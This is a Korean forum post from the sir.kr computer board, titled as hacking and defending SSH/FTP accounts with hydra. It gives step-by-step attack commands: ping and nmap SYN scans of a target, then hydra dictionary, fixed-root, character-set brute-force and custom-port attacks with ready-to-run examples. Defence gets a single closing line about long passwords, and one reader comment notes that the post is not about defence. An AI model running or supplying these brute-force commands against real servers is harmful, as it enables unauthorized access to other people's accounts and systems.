크롬80버전 결제 이슈, 영카트5 주요패치 확인!

[정보] SSH/FTP 서버 hydra를 이용한 아이디 해킹 및 방어를 위해 > 컴퓨터

컨텐츠몰 10% 할인 기간연장!
그누보드5
영카트5
매뉴얼
Q & A
제작의뢰
컨텐츠몰
부가서비스
소모임
커뮤니티

컴퓨터

[정보] SSH/FTP 서버 hydra를 이용한 아이디 해킹 및 방어를 위해 정보

[정보] SSH/FTP 서버 hydra를 이용한 아이디 해킹 및 방어를 위해

본문

 

1. 대상 싸이트 조회
(1) 대상 싸이트 IP 확인하기
형식 : ping 도메인
예시 : ping test.com
(2) 열린 포트 여부 확인하기 
형식 : nmap –sS IP
예시 : nmap –sS 192.168.0.100

2. 사전 파일 공격
-L 과 -P 옵션으로 사전파일을 이용해서 공격
많이 사용되는 단어를 모아서 아이디 및 패스워드 사전을 파일로 만들어서
무자별 대입함. 사전파일은 인터넷을 검색해서 구할수 있음
형식: hydra –L [아이디 사전파일] –P [비밀번호 사전파일] [대상 IP]  ssh –V -f
# hydra -L user.txt -P pass.txt 192.168.0.100 ssh(또는 ftp) -V –f
아이디는 고정해 놓고 비밀번호만 사전 파일로 무차별 대입할 경우
형식 : hydra –l [고정 아이디] –P [비밀번호 사전파일] [대상 IP]  ssh –V -f
# hydra –l root –P pass.txt 192.168.0.100 ssh(또는 ftp) -V –f

3. 순차 대입 공격
-x 옵션으로 비밀번호를 순차대입법으로 공격함.
-x 옵션 형식 : -x 옵션 다음에 숫자1:숫자2:a(A1특수문자)
숫자1은 최소자리수 / 숫자2는 최대자리수 / a 는 소문자 대표. a~z 전체를 의미함
/ A 는 대문자 대표. A~Z 전체를 의미함 / 1 은 숫자 대표. 0~9 전체를 의미함 /
특수문자는 각자 사용함.
# hydra -l root -x 4:4:a1 192.168.0.100 ssh(또는 ftp) -V –f
-x 옵션 예시)
1:5:a1   →  한자리 부터 5자리까지 소문자와 숫자를 조합해서 무차별 대입
6:6:1$  →  6자리로만 숫자와 특수문자$ 을 조합해서 무차별 대입
4:5:A1  →  4자리부터 5자리까지 대문자와 숫자를 조합해서 무차별 대입함

4. 수동 포트 옵션
공격 대상 PC의 서비스 포트가 디폴트가 아닌 경우 사용함.
형식 : -s [포트번호]
# hydra –s 3677 –l root –P pass.txt 192.168.0.100 ssh(또는 ftp) –V –f
# hydra –s 11175 –l root –x 4:5:A1 192.168.0.100 ssh(또는 ftp) -V -f

 

패스워드 길게 만들면 그래도 조금이나만 도움이 될것 같죠..

공감1

댓글 1개

최근 피싱공격을 받아 해킹방어에 관심이 많던 차에 제목을 해킹방어로 오독했네요..
해킹엔 관심이 없는 터라 아쉽습니다.
전체 545 |RSS
컴퓨터 내용 검색

회원로그인

(주)에스아이알소프트 (06253) 서울특별시 강남구 도곡로1길 14, 6층 624호 (역삼동, 삼일프라자) 대표메일:admin@sir.kr
사업자등록번호:217-81-36347 대표:홍석명 통신판매업신고번호:2014-서울강남-02098호 개인정보보호책임자:이총

© SIRSOFT